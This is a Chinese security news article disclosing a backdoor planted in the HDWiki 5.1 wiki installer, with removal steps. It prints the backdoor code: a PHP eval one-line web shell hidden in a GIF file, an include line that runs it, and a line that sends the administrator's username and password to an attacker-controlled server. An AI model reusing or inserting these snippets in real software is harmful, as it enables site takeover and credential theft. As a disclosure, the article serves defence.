HDWiki互动百科5.1版发现“后门”

安全 黑客攻防 数据安全
近日,知道创宇旗下SCANV网站安全中心研究人员发现HDWiki百科建站系统(kaiyuan.hudong.com)“HDWiki5.1正式版”被“骇客”人为植入恶意网站木马(后门)代码。

近日,知道创宇旗下SCANV网站安全中心研究人员发现HDWiki百科建站系统(kaiyuan.hudong.com)“HDWiki5.1正式版”被“骇客”人为植入恶意网站木马(后门)代码。

该代码在站长用户下载安装HDWiki程序后,可以记录并发送管理员密码到“骇客”控制的服务器上,并通过该恶意代码直接控制该站长用户的网站系统,实现“脱库”、“挂马”及“非法SEO”等攻击。

后门文件分析

经过SCANV网站安全中心研究人员分析,“骇客”在HDWiki安装文件包里,对三个文件进行篡改,来实现“远程执行恶意命令,记录管理员帐号密码”的目的。这3个文件为:

/api/uc_client/control/mail.php

/style/default/admin/open.gif

/control/admin_main.php

1、远程执行恶意命令

通过前两个文件的篡改,骇客可获得“远程执行恶意命令“权限,可以直接导致攻击者控制网站系统。其中/style/default/admin/open.gif被植入代码:

<?php@eval($_POST[马赛克])?>

这是“骇客”经常使用到的一句话网站木马代码,恶意代码是放在gif图片内,直接访问无法解析为PHP代码执行,然后“骇客”通过篡改/api/uc_client/control/mail.php文件的第9行代码:

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

包含了这个含有后门代码的图片,这就使图片中的代码得以执行。

2、记录管理员帐号密码

“骇客”通过篡改文件3来实现“记录管理员帐号密码”的目的,被植入代码位于/control/admin_main.php文件的第70行,代码如下:

@file_get_contents('http://www.马赛克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

实现把用户提交的username以及password截获等信息并发送到一个被“骇客”控制远程的服务器。

知道创宇在第一时间通知了HDWiki官方,但截至到本文发布为止,官方没有做出任何积极回应及防御措施。

知道创宇安全研究团队强烈建议站长朋友,在官方清理恶意代码之前,暂停下载安装HDWiki百科建站系统。

对于已经安装的站长朋友,

知道创宇已经紧急推出了诊断工具(http://www.scanv.com/tools/)进行网站体检,确保网站安全。详细分析及解决方案见下:

第一步:通过SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/进行确认是否受该后门影响。

第二步:手动清除恶意代码

[1]将/api/uc_client/control/mail.php文件里删除第9行代码:

@include_once(dirname(__FILE__)."/../../../style/default/admin/open.gif");

复制代码

[2]通过复制文件/style/default/open.gif覆盖/style/default/admin/open.gif

[3]将/control/admin_main.php文件里的删除第70行代码:

@file_get_contents('http://www.马赛克.com/plus/sure/w2.php?username='.$this->user['username'].'&password='.$this->post['password'].'---'.$_SERVER['REMOTE_ADDR'].

'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

第三步:再次通过SCANV网站安全中心后门检测工具:http://www.scanv.com/tools/体检确认。

第四步:登陆网站后台,修改管理员密码。

[注:请务必修改管理员密码,另外处于安全考虑,我们把“骇客”使用的代码部分用“马赛克”字样替换了,请修改代码的时候注意一下。]

关于SCANV网站安全中心及知道创宇

“SCANV网站安全中心”由知道创宇安全研究团队驱动,专注网站安全一体化解决方案,给站长朋友们提供网站漏洞诊断、漏洞预警、被黑预警,并提供多维度的安全解决方案、专家一对一漏洞修复、一键云端防御等。

“知道创宇”全称为北京知道创宇信息技术有限公司。是国内最早提出网站安全云监测及云防御的高新企业,始终致力于为客户提供基于云技术支撑的下一代Web安全解决方案。知道创宇总部设在北京,在香港、上海、广州、成都设有分公司,客户及合作伙伴来自中国、美国、日本、韩国等。

 

责任编辑:吴玮 来源: 网界网
相关推荐

2017-02-09 17:05:03

2017-06-20 10:51:15

芒果

2017-10-26 14:29:50

互动百科

2015-04-17 15:23:10

互动百科

2014-01-07 15:38:28

信息

2018-06-29 17:05:51

互动百科

2017-01-19 17:41:30

百科

2015-10-29 17:20:19

互动百科

2015-05-25 14:19:48

互动百科

2015-11-09 10:15:53

中国网科技频道

2018-06-11 17:00:15

互动百科

2015-06-23 11:23:26

行业百科频道

2015-05-12 13:25:35

互动百科

2013-10-15 15:50:31

互动百科

2017-06-27 14:36:03

移动 互联网

2016-12-06 14:43:00

互动百科

2017-08-25 15:11:00

互动百科

2014-06-25 10:24:32

互动百科

2017-07-06 10:41:34

互动百科

2012-08-13 10:23:13

点赞
收藏

51CTO技术栈公众号